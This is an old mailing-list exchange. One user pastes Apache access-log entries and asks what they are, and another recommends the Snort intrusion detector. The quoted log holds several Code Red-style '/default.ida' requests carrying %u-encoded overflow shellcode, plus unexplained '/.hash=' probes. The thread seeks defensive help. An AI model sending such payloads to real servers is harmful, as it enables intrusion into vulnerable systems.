Hi Konstantin. I do also find a lot of these messages day by day...Since I installed >snort< I know that most of theses attacks try to exploit IIS servers and are so not too important to me. Anyway : since snort "knows" quite a lot of these attacks it will probably help you !
Sven Konstantin Filtschew schrieb:
hi, found this in my /var/log/apache/access.log, what does that mean: 217.37.212.241 - - [04/May/2003:15:17:22 +0200] "GET /default.ida?XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u 9090 %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b 00%u 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 277 "-" "-" 217.128.213.22 - - [04/May/2003:14:50:16 +0200] "GET /default.ida?XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u 9090 %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b 00%u 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 277 "-" "-" 217.218.66.141 - - [04/May/2003:13:39:56 +0200] "GET /default.ida?XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u 9090 %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b 00%u 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 277 "-" "-" 212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET /.hash=680d6f5c4d584f6b5d941a f136938db3751a840b HTTP/1.1" 404 324 "-" "-" 212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET /.hash=e175a0da67b1fefbb5acd8 cdc7ccc516ede015d1 HTTP/1.1" 404 324 "-" "-" 212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET /.hash=8c10ba0aae81edb7ae51eb 156b2fcb770b66864a HTTP/1.1" 404 324 "-" "-" thx for help Konstantin Filtschew
Attachment:
pgpK1n9tIWmDA.pgp
Description: PGP signature